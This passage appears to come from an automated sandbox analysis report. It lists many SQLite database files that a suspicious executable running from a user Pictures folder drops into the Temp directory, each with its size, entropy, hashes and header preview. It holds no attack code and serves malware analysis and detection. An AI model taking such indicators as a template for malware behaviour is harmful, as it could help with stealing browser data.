Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.8180424350137764
Encrypted:	false
SSDEEP:	96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
MD5:	349E6EB110E34A08924D92F6B334801D
SHA1:	BDFB289DAFF51890CC71697B6322AA4B35EC9169
SHA-256:	C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
SHA-512:	2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\RGjzexYIco

Download File

Process:	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\RbAOIYL5eH

Download File

Process:	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\RjBMa5hhm0

Download File

Process:	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\S0E2EmvSXR

Download File

Process:	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.5712781801655107
Encrypted:	false
SSDEEP:	12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
MD5:	05A60B4620923FD5D53B9204391452AF
SHA1:	DC12F90925033F25C70A720E01D5F8666D0B46E4
SHA-256:	6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
SHA-512:	068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Sk2S9rt9e7

Download File

Process:	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe
File Type:	SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.5707520969659783
Encrypted:	false
SSDEEP:	12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
MD5:	9F6D153D934BCC50E8BC57E7014B201A
SHA1:	50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
SHA-256:	2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
SHA-512:	B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
Malicious:	false
Preview:	SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\SsZqQ2OnEY

Download File

Process:	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
Category:	dropped
Size (bytes):	28672
Entropy (8bit):	2.5793180405395284
Encrypted:	false
SSDEEP:	96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
MD5:	41EA9A4112F057AE6BA17E2838AEAC26
SHA1:	F2B389103BFD1A1A050C4857A995B09FEAFE8903
SHA-256:	CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
SHA-512:	29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Swtkpc9btI

Download File

Process:	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe
File Type:	SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.5707520969659783
Encrypted:	false
SSDEEP:	12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
MD5:	9F6D153D934BCC50E8BC57E7014B201A
SHA1:	50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
SHA-256:	2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
SHA-512:	B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
Malicious:	false
Preview:	SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\TjW7zCrSIS

Download File

Process:	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe
File Type:	SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.5707520969659783
Encrypted:	false
SSDEEP:	12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
MD5:	9F6D153D934BCC50E8BC57E7014B201A
SHA1:	50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
SHA-256:	2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
SHA-512:	B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
Malicious:	false
Preview:	SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\UWkqIDcAnU

Download File

Process:	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\UZPFVpoZMA

Download File

Process:	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\UoBgkd9SYI

Download File

Process:	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\UyUOTMz82p

Download File

Process:	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\VVgm5r8zzb

Download File

Process:	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.8180424350137764
Encrypted:	false
SSDEEP:	96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
MD5:	349E6EB110E34A08924D92F6B334801D
SHA1:	BDFB289DAFF51890CC71697B6322AA4B35EC9169
SHA-256:	C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
SHA-512:	2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\ViuX3uftX7

Download File

Process:	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\VmnB57YcQx

Download File

Process:	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Vnl6vfjE2e

Download File

Process:	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\WOacyDnsS2

Download File

Process:	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\WPVBRw8B7g

Download File

Process:	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\WbE18eDCd9

Download File

Process:	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\WkVJ4gPCGf

Download File

Process:	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
Category:	dropped
Size (bytes):	28672
Entropy (8bit):	2.5793180405395284
Encrypted:	false
SSDEEP:	96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
MD5:	41EA9A4112F057AE6BA17E2838AEAC26
SHA1:	F2B389103BFD1A1A050C4857A995B09FEAFE8903
SHA-256:	CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
SHA-512:	29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\WlSaeLSMyI

Download File

Process:	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
Category:	dropped
Size (bytes):	28672
Entropy (8bit):	2.5793180405395284
Encrypted:	false
SSDEEP:	96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
MD5:	41EA9A4112F057AE6BA17E2838AEAC26
SHA1:	F2B389103BFD1A1A050C4857A995B09FEAFE8903
SHA-256:	CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
SHA-512:	29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\X6jyyRTISw

Download File

Process:	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe
File Type:	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	0.08235737944063153
Encrypted:	false
SSDEEP:	12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
MD5:	369B6DD66F1CAD49D0952C40FEB9AD41
SHA1:	D05B2DE29433FB113EC4C558FF33087ED7481DD4
SHA-256:	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
SHA-512:	771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\X8zy4QQrvy

Download File

Process:	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\X9AyFPTXPw

Download File

Process:	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\XFBJ4ivL6T

Download File

Process:	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\XH0l3EA6US

Download File

Process:	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
